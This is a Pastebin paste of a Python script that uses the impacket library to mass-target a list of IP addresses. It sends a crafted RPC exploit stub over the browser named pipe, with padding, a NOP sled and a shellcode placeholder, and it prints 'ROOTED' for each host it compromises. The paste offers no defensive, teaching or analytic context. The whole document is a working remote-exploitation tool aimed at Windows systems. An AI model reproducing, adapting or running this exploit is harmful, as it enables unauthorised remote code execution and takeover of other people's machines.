Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #DISCORD: https://discord.gg/PTW3yPp
- import struct
- import sys
- import time
- import os
- from threading import Thread
- from impacket import smb
- from impacket import uuid
- from impacket import dcerpc
- from impacket.dcerpc.v5 import transport
- buf = "shellcode line1"
- buf += "shellcode line2"
- #DO NOT REMOVE THIS
- stub = "\x21\x00\x00\x00" #dwPid = PID_IP (IPv4)
- stub += "\x10\x27\x00\x00" #dwRoutingPID
- stub += "\xa4\x86\x01\x00" #dwMibInEntrySize
- stub += "\x41"*4 #_MIB_OPAQUE_QUERY pointer
- stub += "\x04\x00\x00\x00" #dwVarID (_MIB_OPAQUE_QUERY)
- stub += "\x41"*4 #rgdwVarIndex (_MIB_OPAQUE_QUERY)
- stub += "\xa4\x86\x01\x00" #dwMibOutEntrySize
- stub += "\xad\x0b\x2d\x06" #dwVarID ECX (CALL off_64389048[ECX*4]) -> p2p JMP EAX #dwVarID (_MIB_OPAQUE_QUERY)
- stub += "\xd0\xba\x61\x41\x41" + "\x90"*5 + buf + "\x41"*(100000-10-len(buf)) #rgdwVarIndex (_MIB_OPAQUE_QUERY)
- stub += "\x04\x00\x00\x00" #dwId (_MIB_OPAQUE_INFO)
- stub += "\x41"*4 #ullAlign (_MIB_OPAQUE_INFO)
- with open("bios.txt") as fp:
- cnt = 0
- for line in fp:
- print "[%d] Attacking ---> %s" % (cnt, line.rstrip())
- try:
- del trans
- del dce
- print("Variable Reset[GOOD]")
- except:
- print("No Variable[GOOD]")
- pass
- try:
- print("Attempting Connection")
- trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % line)
- trans.connect()
- print("[+] Connected Successfully!")
- dce = trans.DCERPC_class(trans)
- dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))
- dce.call(0x1e, stub)
- print("[+] ROOTED | Exploit Sent Successfully")
- del dce
- del trans
- except:
- print("[+] :( NO ROOT")
- cnt += 1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
